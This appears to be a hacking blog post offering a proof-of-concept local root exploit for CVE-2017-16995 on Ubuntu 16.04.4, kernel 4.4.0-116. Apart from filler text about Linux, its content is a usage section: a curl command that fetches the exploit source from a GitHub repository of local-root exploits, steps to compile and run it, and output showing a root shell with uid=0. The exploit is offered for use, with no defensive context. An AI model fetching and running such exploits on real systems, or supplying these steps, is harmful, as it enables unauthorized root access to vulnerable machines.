Linux Kernel Exploit 2018 - 4.4.0-116 Generic (Ubuntu 16.04.4) Local Privilege Escalation - Pixel-Code

Linux Kernel Exploit 2018 - 4.4.0-116 Generic (Ubuntu 16.04.4) Local Privilege Escalation

Hello pixel friend this time I will share Linux Kernel Exploit 2018 - 4.4.0-116 Generic (Ubuntu 16.04.4) Local Privilege Escalation and Proof of concept.

Whats is Linux Kernel ?
The Linux kernel is an open-source monolithic Unix-like computer operating system kernel. The Linux family of operating systems is based on this kernel and deployed on both traditional computer systems such as personal computers and servers, usually in the form of Linux distributions,[9] and on various embedded devices such as routers, wireless access points, PBXes, set-top boxes, FTA receivers, smart TVs, PVRs, and NAS appliances. The Android operating system for tablet computers, smartphones, and smartwatches uses services provided by the Linux kernel to implement its functionality. While the adoption on desktop computers is low, Linux-based operating systems dominate nearly every other segment of computing, from mobile devices to mainframes. As of November 2017, all of the world's 500 most powerful supercomputers run Linux.

Proof of Concept :
Kernel Exploits is A bunch of proof-of-concept exploit for the Linux kernel.
A proof-of-concept local root exploit for CVE-2017-16995. Tested on 4.4.0-116-generic #140-Ubuntu kernel.

Usage :
Example:
$ curl https://github.com/Snoopy-Sec/Localroot-ALL-CVE/blob/master/2018/Paw.c
$ gcc -pthread paw.c -o paw -lcrypt
$ chmod +x paw
$ ./paw

task_scruct = ffff880126c1c00
uidptr = ffff88018862ea84
spawning root shell
root@server ~$id
uid=0(root) gid=0(root) groups=0(root),5002(sshusers),5008(client3)

1 Response to "Linux Kernel Exploit 2018 - 4.4.0-116 Generic (Ubuntu 16.04.4) Local Privilege Escalation"

Emoticon Urutan